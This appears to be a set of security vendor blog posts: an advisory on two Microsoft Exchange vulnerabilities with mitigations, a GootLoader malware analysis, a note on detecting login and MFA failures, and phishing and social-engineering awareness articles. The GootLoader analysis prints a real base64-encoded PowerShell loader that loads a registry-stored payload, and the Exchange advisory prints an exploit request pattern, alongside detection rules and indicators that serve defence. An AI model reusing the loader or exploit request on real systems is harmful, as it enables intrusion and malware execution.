New Unpatched Microsoft Exchange Vulnerabilities - Remote Code Execution Vulnerabilities Allowing Potential Attacker Access

By: Director of Threat Research, Kevin O’Connor

Microsoft has confirmed a new pair of unpatched vulnerabilities affecting its Exchange mail server platform. Tracked as CVE-2022-41040 and CVE-2022-41082, Microsoft validated the exploits’ existence and confirmed they are actively being used in the wild by malicious actors to compromise systems. This vulnerability is believed only to affect on-premises instances of Microsoft Exchange contained in Microsoft Windows Server 2013, 2016, and 2019, and not cloud-based Microsoft O365 mail applications and services such as Exchange Online, which Microsoft attests has detections and mitigations already in place. Microsoft Exchange Online customers do not need to take any action.

What you Need to Know

Microsoft does not currently have a patch available for the vulnerabilities but recommends that on-premise Microsoft Exchange customers should review and apply URL Rewrite Instructions and block exposed Remote PowerShell Ports. A guide by Microsoft for adding the blocking rule can be found here.

Add A Blocking Rule

  • Open the IIS Manager.
  • Expand the Default Web Site.
  • Select Autodiscover.
  • In the Feature View, click URL Rewrite.
  • In the Actions Pane on the right-hand side, click Add Rules.
  • Select Request Blocking and Click OK
  • Add the following string and click OK:
    • .*autodiscover\.json.*\@.*Powershell.*
  • Expand the rule and select the rule and click Edit under Conditions
  • Change the condition input from {URL} to {REQUEST_URI}

Blocking PowerShell Ports

Block the following ports used for Remote PowerShell

HTTP: 5985

HTTPS: 5986

The pair of CVEs are Server-Side Request Forgery (SSRF) (CVE-2022-41040) and Remote Code Execution (RCE) (CVE-2022-41082) vulnerabilities. The SSRF vulnerability can only be used by authenticated attackers suggesting that credentialed or other authorized access is needed to exploit the system. The SSRF vulnerability can then be used to enable the usage of the RCE vulnerability.

The vulnerabilities were uncovered by GTSC, a Vietnamese security company, during monitoring and incident response services in live networks. GTSC detected exploit requests in ISS logs with the same format as the previous 2021 ProxyShell RCE vulnerability:

autodiscover/autodiscover.json?@/&Email=autodiscover/autodiscover.json%3f@

It’s been observed in the wild that the CVEs have been used to drop webshells on exploited Exchange servers, including Antsword, a Chinese opensource cross-platform website administration tool supporting webshell management. The webshell’s codepage is also set to a Microsoft character encoding for simplified Chinese, again suggesting China-based actor involvement. During these exploitation campaigns, attackers leveraging the vulnerabilities also modified the file RedirSuiteServiceProxy.aspx to contain a webshell. GTSC also reported the use of SharPyShell, a small and obfuscated ASP.net webshell for C# web applications.

As part of their Tactics, Techniques, and Procedures (TTPs), attackers exploiting the vulnerabilities have also been observed leveraging the native Windows binary, certutil.exe, to connect to command-and-control infrastructure and retrieve malicious payloads. Some of the commands share similarities with those used by the Chinese Chopper web shell malware. The attackers also leverage in-memory DLL injection and native Windows WMIC systems to execute files.

To identify potential exploitation leveraging these vulnerabilities, administrators can check Microsoft IIS Logs for the following string indicating potential compromise:

    powershell.*autodiscover\.json.*\@.*200

Microsoft is currently working to develop a patch for the vulnerabilities; however, Microsoft Exchange administrators should take immediate action to defend systems and search for prior signs of compromise.

Keeping a network secure from zero-day exploitation requires a layered defense-in-depth approach. Externally available services such as email servers continue to be a prime target for exploitation by threat actors. Systems such as Adlumin’s Perimeter Defense capabilities can monitor these external systems for the appearance of exploitation artifacts such as newly opened ports on internet-accessible servers used for remote exploitation interfaces such as PowerShell.

Continuous Monitoring

Adlumin recommends using a Continuous Vulnerability Management (CVM) product to collect the needed data from endpoints to determine if they are running vulnerable versions of Microsoft Windows and Office. CVM software can also be used to identify those assets which have or do not have the official Microsoft mitigation in place. Adlumin also recommends leveraging the business’s SIEM product to continually search and alert for suspicious executions which may be a result of the exploitation of the vulnerability.

Resources

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-41040
  3. https://gteltsc. vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server (Deprecated)
  4. https://www.techtarget.com/whatis/feature/Everything-you-need-to-know-about-ProxyShell-vulnerabilities
  5. https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/
  6. https://github.com/antonioCoco/SharPyShell

Everything you Need to Know about Tracking GootLoader

By: Kyle Auer & Kevin O’Connor
Adlumin’s Threat Visibility Team has observed an increase in GootLoader-based malware and identified a possible unified campaign leveraging GootLoader with follow-on Cobalt Strike payloads in attempts to breach U.S. businesses including multiple Adlumin customers.

What is GootLoader?

GootLoader is a presumed access-as-a-service malware 1, with its developers also being responsible for the GootKit malware as first reported by Dr. Web in 2014 2. GootKit, the actor’s namesake and original toolkit, is distinct from GootLoader in that GootLoader is closer to an initial access capability which leverages follow on stages such as Cobalt Strike, various Ransomware payloads, and potentially GootKit – the latter of which has fallen out of favor since gaining notoriety in 2019 due to infrastructure compromise 3.
As an access-as-a-service malware, the GootLoader operators would be expected to sell direct access to compromised hosts and systems or provide buyers with harvested credentials and access points into a targeted network. A less frequent operation under this model might involve the GootLoader actors loading second-stage payloads as access brokers.

Tracking the Campaign

Adlumin is observing and tracking an active exploitation campaign utilizing GootLoader against U.S. businesses in multiple industries and verticals. What we’ve observed in this campaign is uniform deployment of Cobalt Strike payloads following exploitation and initial access provided by GootLoader. It’s unknown if these Cobalt Strike payloads are used by GootLoader developers to provide direct access to an infected target or used to harvest credentials and other data which is brokered to a buyer for access or exploited in some other way.
Our investigation is tracking an exploitation campaign which we defined based on:

  1. Like to identical initial access and exploit methodologies
  2. Like to identical command and control infrastructure and methodology
  3. Like to identical operations time-frame
  4. Like to identical first-stage “loader” malware, GootLoader
  5. Like to identical second-stage follow-on malware, Cobalt Strike

Campaign Tactics, Techniques, and Procedures (TTPs)

This GootLoader campaign begins its attack by phishing potential victims’ business emails. Unlike other campaigns reported earlier in 2021 and 20224, this campaign has not yet been observed relying on specific SEO poisoning attacks to deliver its payload. We believe the payloads are also not being disguised as legitimate JQuery libraries as previously seen.
It starts with an email…

Figure 1: The Attack Begins with a Malicious JavaScript file contained in a Zip Archive

The first stage in the campaign against a target is a simple phishing email. These emails have an attached Zip archive, which contains a JavaScript payload the victim is tricked in to running after opening. This JavaScript payload is executed by a Windows Operating System native binary, Windows Script Host (wscript.exe), which is a legitimate application typically used for logon scripts, administration, and automation and provides an execution environment in which the script can run. Our team believes that the JavaScript payload is delivered via a compressed archive to help mitigate detection by email and malware scanners.

GootLoader_Image_2

Figure 2: JavaScript is executed by wscript.exe

GootLoader will then use this wscript.exe executing JavaScript to download an additional  JavaScript resource which is loaded by the original calling wscript.exe process. This secondary exploitation payload is responsible for persisting two separate payloads.

GootLoader_Image_3

Figure 3: wscript.exe retrieves payloads from Command and Control Server

Persistence

GootLoader will use its secondary JavaScript payload to write two registry keys to the Window’s Current User registry hive (HKCU). In this tracked campaign the two registry keys were stored in:

  • HKCU:\\Software\Microsoft\Phone\user0
  • HKCU:\\Software\Microsoft\Phone\user

GootLoader_Image_4

Figure 4: wscript.exe runs PowerShell to persist malware as a task, and writes encoded payloads to registry

Kick-Off

After having saved the next two stages to the registry, the wscript.exe process will execute PowerShell to run PowerShell commands which will kick-off the first-stage malware implant. To help evade detection by security software, the executed PowerShell commands make use of multiple evasion techniques including

  • Base64 Encoding the Command
  • Command abbreviation
  • Variable substitution
  • String concatenation
    • MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=

Decoding from Base64 and encoding with UTF-16LE we can see the commands contents:

GootLoader_Image_5

Figure 5: Decoded PowerShell Command Loading Stage 1 Implant

This command will grab the contents of the first registry key, HKCU:/SOFTWARE/Microsoft/phone/$USERNAME0, decode the encoded .NET DLL it contains, and then run the Test() function contained in the DLL us as an execution start point.

Obtaining Decoded Stage-1

To get the malware to drop the DLL unencoded for further analysis rather than directly loading and calling it via PowerShell, we modified the executed PowerShell command to write the contents to a file by appending the following before the last SLEEPfunction.

                  +> Set-Content $PATH -Value $ejv -Encoding Byte

This allowed us to analyze this first-stage implant to identify that the Test() function was being used to load the second-stage implant.

GootLoader_Image_6

Figure 6: PowerShell.exe decodes the GootLoader implant which decodes and runs the secondary payload, Cobalt Strike

Second Stage Payload

The second payload and malware implant used by GootLoader in this campaign is Cobalt Strike. The second registry key written in the earlier stage to HKCU:\..Phone\$USERNAME contains an encoded Cobalt Strike beacon. When the first-stage’s Test() function is executed, it decodes, loads, and executes the Cobalt Strike beacon into memory.

To analyze the Cobalt Strike beacon we modified the retrieved first payload which loads the beacon, to instead write the beacon unencoded to disk for retrieval and analysis. We did this by adding additional library imports used for writing a file and adding a main function which will call the Test() loader.

GootLoader_Image_7

Figure 7: Adding additional imports to 1st Stage Malware Implant

GootLoader_Image_8

Figure 8: Adding function to call the 2nd Stage DLL’s Test() function

We then created a BinaryWriter object and comment out some of the lines which would execute the Cobalt Strike beacon.

Figure 9: Modifying 1st stage to prevent 2nd stage execution and retrieve decoded 2nd stage

After building and running the code, we obtained the decoded second-stage Cobalt Strike payload.

Extracting Campaign IOCs from Cobalt Strike

Cobalt Strike is a paid penetration testing software which includes configurable malware implants that are often repurposed for use in real malware operations and infections. The Cobalt Strike beacon provides functionality for the attacker including command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained[5].Cobalt Strike has exploded in popularity in usage by cyber-criminals[6], and is a perfect launching platform for continued attacks or access transfer.

Once we had the decoded Cobalt Strike beacon written to disk, we were able to use public decoders to extract Cobalt Strike configuration information such as command and control addresses. We used the Python-based Cobalt Strike Configuration Extractor and Parser which can be found on GitHub, here.

Figure 10: Decoded Cobalt Strike Beacon Payload

This allowed us to obtain the malware command and control infrastructure used by the attackers to control the Cobalt Strike implant.

Figure 11: Cobalt Strike is run and beacons to Cobalt Strike command and control server

Summary & Future Reads

Once Adlumin’s Threat Visibility Team had the initial payload, follow-on implant stages, and leads on command-and-control infrastructure, we quickly created detections for our MDR platform, which merges data from multiple security relevant data sources including the endpoint and installed security software. These detections caught subsequent attacks from the same campaign and identified some historical retroactive activity. Some key defenses and mitigations for the campaign include:

  • Adequate phishing mitigation and attachment scanning solutions
  • Monitoring of wscript.exe executions of JavaScript files from compressed archives
  • Monitoring of PowerShell executions, especially of encoded commands, which have a parent process of wscript.exe
  • Implementing a Proactive Defense program that is equipped with fully managed security awareness testing and training, designed to empower employees to recognize and reduce the risk posed by cybercriminals.

Additionally, Adlumin is sharing the following indicators used in this campaign with the community:

  • 93[.]115[.]29[.]50
  • hxxps://streamlock[.]net

We’d also like to share the below Sigma rule to help identify possible exploitation activity:

title: GootLoader Zipped JS WScript
id: 37d82863-216a-41a3-a4de-b09cea08eb92
action: global
status: experimental
references:
– https://adlumin.com
date: 2022/09/26
tags:
– attack.execution
– attack.t1059
author: Adlumin, Kyle Auer, Kevin O’Connor
detection:
condition: selection
level: medium
logsource:
category: process_execution
product: windows
detection:
selection_1:
Image|endswith:
– ‘\powershell.exe’
ParentImage|endswith
– ‘\wscript.exe’
selection_2:
Image|endswith:
– ‘\wscript.exe’
selection_3:
CommandLine|all:
– ‘*AppData*’
– ‘*zip*’
– ‘*.js*’
condition: (selection_1 or selection_2) and selection_3

Make sure to follow Adlumin for follow-up posts where we’ll dive deeper into the actor’s infrastructure and operations!

Resources:

  1. https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html
  2. https://securelist.com/gootkit-the-cautious-trojan/102731/
  3. https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/
  4. https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader
  5. https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
  6. https://threatpost.com/cobalt-strike-cybercrooks/167368/

Your Guide to Detecting Access Failure Incidents

By: Data Scientists Bronwen Cohn-Cort and Shaul Saitowitz

Usernames and passwords are keys to computer systems and networks, but they are often inadequate for keeping intruders out. Even additional layers of authentication can be compromised. Adlumin keeps its customers safe by monitoring networks for suspicious break-in attempts and authentication malfunctions.

Brute Force, but Not with a Crowbar

Hackers use scripts or applications such as THC Hydra to submit many guesses for user credentials – a brute force attack. Guessing tactics range from a simple systematic approach to using external logic to prioritize the most likely combinations.

Any asset that uses credentials is vulnerable to brute force attacks, from user accounts to VPNs or network switches. Each of these represents different risks. Cracking a network switch could allow the attacker to access any traffic flowing through that switch and even make changes to the switch itself. Breaking into a VPN would give access to the network and anything else authorized for the connection.

Access Failure Chart Adlumin

Figure 1: Counts of Failed Office365 Logins

Adlumin monitors all incoming logs for our tenants, looking for evidence of brute force attacks at all possible entry points. Suspicious numbers of failed logins over a short interval indicate that an attacker attempts to break in by trying many password permutations. This triggers an alert, notifying the customer of the break-in attempt so that protective action can be taken.

The Deadbolt

Often used in conjunction with password logins, Multi-factor Authentication (MFA) service providers allow users of a subscribing client to authenticate via other methods, thereby adding another layer of security. One standard additional layer is a Possession Factor, where a user enters a 6-digit code sent as a text message, email, or given by an authenticator app to an account or device to which only the user has access. In the MFA context, a password can be classified as a Knowledge Factor; thus, these two factors (Knowledge and Possession) authenticate the user. This is also called 2-Factor Authentication (2FA). Enabling MFA or 2FA across all users is a simple step to improving security and delaying attackers or keeping them out of a system.

Adlumin authentication Diagram

Figure 2: Disruptive situations around MFA credentials

Adlumin Data Science is developing a detection for disruptions in a client’s MFA service – incidents that can challenge business continuity or represent even more insidious threats. The approach involves reviewing the number of users unable to access their account via MFA within a specific period. As described earlier in this article, this activity could be an attacker attempting brute force methods to access the system by logging in to multiple user accounts and looking to gain access via a user that hasn’t enabled MFA. This activity could also be that the MFA service provider is compromised or has otherwise experienced an incident that impacts credential authentication, leading to many users being locked out of their accounts. In both instances of MFA credentials being denied or resulting in the locking-out of users, the client’s business is disrupted.

Adlumin Data Science’s development of detection based on identifying an unusual number of users experiencing lockouts or having credentials denied over a specific period would warn clients that use MFA service providers of a possible impending disruption or attack.

Warning of Possible Disruptions

Whether caused by a brute force attack or a compromised MFA service provider, Adlumin Data Science monitors for a suspicious or unusual amount of credential activity for network switches, user accounts, or other credentialed locations. Adlumin’s identification of such a disruption or break-in attempt warns customers to take protective action.

Could you be the Next Bait for a Phishing Attack?

By:
Krystal Rennie, Director of Corporate Communications,
and Brittany Demendi, Corporate Communications Manager

Have you ever received an email informing you that you’ve won an all-expense paid trip to the Bahamas in a raffle you never entered? Or received an email from a streaming service notifying you that your credit card was rejected and to click on the link to update your payment method? You’ve been exposed to a form of phishing. These are examples of email phishing, which use tactics that are untargeted but appear everywhere. By comparison, more targeted versions of phishing are more dangerous and can lead to identity theft, unauthorized access to sensitive data, or the defrauding of funds.

To an organization, phishing is always a severe risk. Phishing is an early-stage and reliable tactic used by hackers to gain access to networks as a part of a larger attack. For example, if you’ve been mentoring a graduate student for weeks and they send you an academic survey would you open it? If your CFO receives formal notification of a lawsuit from a competitor, would you contact the law firm? If your IT department sends a message about service upgrades that require a new log in, would you follow the instructions? These can all examples be examples of phishing.

Cybercriminals commonly use phishing to lure potential victims into performing harmful actions that could put your organization’s data at risk. This technique is the art of manipulating people to give up confidential information by either typing their login credentials to a fake company website or clicking a malicious attachment they thought was an invoice. Because phishing is effective and straightforward, cybercriminals launch thousands of attacks daily and can often be successful.

Five Most Common Types of Phishing Attacks

Regardless of the type of organization, large or small, they will be targeted by cybercriminals attempting a phishing attack. Phishing attacks are getting more difficult to spot, as some attacks will even surpass the most observant employees. Education on these different types of phishing attacks is essential. Below are five common types of phishing attacks:

  1. Spear-Phishing is a targeted attack that aims to steal sensitive data from a specific organization or individual. Cybercriminals lure in the victims with personal information specific to the organization or the employee to seem more legitimate.
  2. Vishing is a phishing attack that occurs over the phone. Calls are usually made using a spoofed ID to make it seem safe to answer. As an example, a hacker could pose as a representative at your bank or credit union and call to alert you that there has been questionable activity on your account. Once they’ve gained your trust, the hacker will ask for your personal account information and can use that information to commit identity fraud.
  3. Whaling is a cyberattack that includes a high-level choice of target in an attempt to steal and misuse private, personal information of senior management at a company/organization. Whaling occurs in the form of emails that are more sophisticated than phishing and are often harder to recognize due to their use of elite corporate language. The email will include personalized information about the target or organization.
  4. Smishing uses SMS to text personal information like credit card information, passwords, and more to appear legitimate and acquire additional information. The text message usually includes a call to action to demand an immediate response or reaction.
  5. Clone Phishing involves receiving a spoofed email that looks identical to one sent by someone you already received emails from. The spoofed email is malicious however, and contains new information along with malicious links or attachments.

Consequences of a Successful Attack

Although the types of phishing attacks vary regarding risk levels, one thing they all have in common is the power to damage a business. Below are a few possible results of a successful phishing attack:

  • Unauthorized transactions
  • Password and username manipulation
  • Account takeovers
  • Identity theft
  • Credit card theft
  • Stolen data
  • Stolen funds
  • Sensitive data sold to third parties

These are just a few examples of what could become compromised when these attacks occur. Companies must invest in the proper Managed Detection and Response platform and Proactive Defense Program to help protect sensitive information and train employees on security awareness.

Be Proactive Against Phishing Attacks, Not Reactive

Equipping employees with the proper knowledge is the best defense when protecting an organization’s data and assets from phishing attacks. In 2019, a major healthcare company reported that one of its employees stopped a phishing attack within 19 minutes, according to Comparitech. Their employee said that they received suspicious emails, and their Security Operations Center was able to take care of it immediately. Creating a security culture within every department, not just IT, is vital.

As phishing emails become harder to detect, investing in security awareness training like a Proactive Defense Program will be the main differentiator between robust risk management plans from the weak ones. The truth is that phishing attacks’ future depends on many factors. Cybercriminals are discovering new ways to step their game up daily and have become more sophisticated with their attacks. That said, it is up to the rest of us to find new ways to combat their tactics. At the end of the day, there is too much at stake if we do not think multiple steps ahead of cybercriminals.

Five Unique Tactics of Social Engineering Attacks

By: Krystal Rennie, Director of Corporate Communications, and Brittany Demendi, Corporate Communications Manager

Five Unique Tactics of Social Engineering Attacks is a part of Adlumin’s Cyber Blog content series. For more information about how your organization can protect itself from cybercriminals, browse more from our knowledge-rich series here.

Social Engineering Adlumin Stats

As cybercriminal organizations and state-sponsored actors grow in sophistication and capability, they remain loyal to the simple tactics and techniques that deliver results. “Social Engineering” might not carry the glamor of a technical zero-day malware attack, but it works. Social engineering works so well that 90% of cyberattacks on organizations involve some form of the tactic, according to KnowBe4. Employees are then vulnerable to influence and often become unwitting accomplices in a cybercrime.

Social Engineering is when “an attacker uses human interaction (social skills) to obtain or compromise information about an organization or its computer systems. An attacker may seem unassuming and respectable, possibly claiming to be a new employee, repair person, or researcher and even offering credentials to support that identity.”

Cybersecurity & Infrastructure Security Agency (CISA).

Social engineering tactics can take multiple forms, from collecting publicly available information on social media to conducting search engine analysis. Fundamentally, these tactics identify valuable tools and information that potential victims might seek and be more likely to interact with. Social Engineering is about gaining a user’s trust.

Social engineering strategies can involve fake emails and websites that look authentic and can fool the entire spectrum of employees. Everyone can be a target, from engineers to sales and marketers, finance admins, and senior executives. Social engineering aims to manipulate a target user into revealing sensitive data about their business or personal information. This stolen information can create a phishing campaign that looks authentic. These attacks seek to gain information and can take many different forms, making it harder to pinpoint the cybercriminal’s entry point.

Five Common Tactics of Social Engineering

  1. Scareware: An attack that bombards victims with false alarms and fictitious threats about their devices. Victims are misled to think that their systems are infected with malware, prompting them to install malicious software or malware itself. In one of the most extreme cases, following a massive credit theft from a major retailer, cardholders were contacted through phone calls and asked to update their security measures. Of course, the calls came from cybercriminals collecting victims’ PINs and passwords.
  2. Baiting: A form of social engineering that incentivizes users to take action the attacker wants. These attacks often include offers of gifts, exclusive offers, courier packages, and other well-known “lures.” Engaged users give up their personal information or sign up for fictitious accounts, exposing their passwords. Since passwords are often recycled across multiple accounts, this can create a severe breach and risk to the organization. Rarely can baiting even use physical media like flash drives. Dropped in the employee parking lot, an unassuming individual may accidentally release malware once installed on a company computer.
  3. Pretexting: In this form of social engineering, attackers approach victims requesting sensitive information necessary to complete a critical task or service. Appearing as friendly actors, these criminals solicit data about the victim using various motivators like tax refunds, payments, deliveries, or business-related projects.
  4. Spear Phishing: These attacks target individuals with roles within the company, seniority, rank, authority, and access to critical systems. They often target professionals such as lawyers, doctors, or engineers presented with fake license complaints and lawsuits. In other cases, executives were targeted with emails and branded file shares containing lawsuit filings, the basis of which was stolen from publicly available court filings and stolen litigation material. Spear Phishing is perhaps one of the most challenging forms of engineering because it is extremely difficult to distinguish from legitimate traffic and communications.
  5. Quid Pro Quo: This type of attack centers around an exchange of service or information convincing the victim to act. Typically, the cybercriminal will promise rewards or leverage implicit work motivations to the victim for information that can be used to steal money or take control of a company account or data. One of the most common examples is when the cybercriminal poses as an IT employee asking for or offering technical support.

Many social engineering schemes happen daily. Like all strategies, some techniques are more well-known than others. However, unlike other cyberattacks, human interaction is a critical component of social engineering, which should make you think more carefully about your daily interactions on the internet. These attacks underline the importance of understanding that attacks are much harder to identify and often dupe employees in the early stages of a much larger cyber campaign.

Training is Key to Proactive Defense Against Social Engineering

Employees are your organization’s first line of defense regarding protection from social engineering methods. If employees are not appropriately trained against these tactics, your security software can only defend you until someone clicks on a malicious link.

Yes, there are ways to hunt these threats before they take over your IT network, but it’s best to think proactively and put the fire out at the source.  Finding and implementing the right Proactive Defense Program will empower employees with skills to find and report suspicious activity. These are not just one-off sessions that overwhelm employees with the information they soon will forget. It’s consistent training that creates a positive cybersecurity culture within the organization.

Training needs to be persistent and delivered in small doses throughout the year for information retention. Proactive Defense Programs use real-life de-weaponized attack campaigns to test employees. In addition, implementing training ensures your organization complies with set industry regulations and set policies and tracks and trains high-risk users.

What’s Next?

Now that you have this new information, you might wonder, what’s next? The best advice when attempting to combat social engineering threats is to know the signs and prioritize implementing a Proactive Defense Program throughout your company. Social engineers manipulate feelings and human logic to lure victims into their traps. As a result, we must be wary of what we open, click, and interact with while navigating our online experiences. Always remain alert and trust your gut instinct; if something doesn’t feel right, nine times out of ten, it isn’t right.